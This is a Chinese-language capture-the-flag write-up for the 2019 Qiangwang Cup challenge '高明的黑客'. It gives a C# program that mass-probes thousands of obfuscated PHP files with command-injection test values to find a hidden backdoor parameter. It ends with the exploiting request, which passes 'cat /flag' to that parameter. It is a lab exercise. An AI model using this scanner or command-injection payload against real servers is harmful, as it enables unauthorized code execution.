[强网杯 2019]高明的黑客

首页长这样

离谱了

（草

这么多代码人工审计是不现实了（每日一题都不容易，这直接给我每日数千题QAQ），部署到了本地，尝试黑箱爆破

网上有大佬写好的exp，但是不会pythonQAQ，所以就用C#自己写了个（话说没有GIL，C#的多线程会不会比python快很多呢www）

using System.Text.RegularExpressions;

var dir = "/usr/share/nginx/html/src";
var files = Directory.GetFiles(dir);

var regexGet = new Regex(pattern: @"\$_GET\['(\w+)'\]");
var regexPost = new Regex(pattern: @"\$_POST\['(\w+)'\]");
var regexResponse = new Regex(pattern: @"maybeapayload");

Parallel.ForEach(files, file =>
{
    using StreamReader reader = File.OpenText(file);
    var content = reader.ReadToEnd();

    var matches = regexGet.Matches(content);
    var namesGet = new List<string>();
    foreach (Match match in matches)
    {
        var nameGet = match.Groups[1].Value;
        namesGet.Add(nameGet);
    }

    matches = regexPost.Matches(content);
    var namesPost = new List<string>();
    foreach (Match match in matches)
    {
        var namePost = match.Groups[1].Value;
        namesPost.Add(namePost);
    }
    UriBuilder uriBuilder = new()
    {
        Host = "localhost",
        Path = $"src/{Path.GetFileName(file)}",
        Query = string.Join('&', namesGet.ConvertAll(nameGet => $"{nameGet}=echo maybeapayload"))
    };
    // Console.WriteLine(uriBuilder.Uri);
    Dictionary<string, string> dict = new();
    namesPost.ForEach(namePost => dict.Add(namePost, "echo maybeapayload"));

    using HttpClient client = new HttpClient();
    using var response = client.PostAsync(uriBuilder.Uri, new FormUrlEncodedContent(dict)).Result;

    if (regexResponse.IsMatch(response.Content.ReadAsStringAsync().Result))
    {
        Console.WriteLine(file);
        Console.WriteLine(response.Content.ReadAsStringAsync().Result);
    }
});

跑完差不多花了4秒（打开优化的情况下），感觉效率蛮高

顺藤摸瓜找一找在php中出现的位置

这这这这藏得也太隐蔽了叭，出题人呕心沥血生成几千个文件来雷普萌新，他真的，我哭死==

/xk0SzyKwfzw.php?Efa5BVG=cat /flag

> Passions & dreams like sora, *zipped* up in my heart

[强网杯 2019]高明的黑客

> Passions & dreams like sora, zipped up in my heart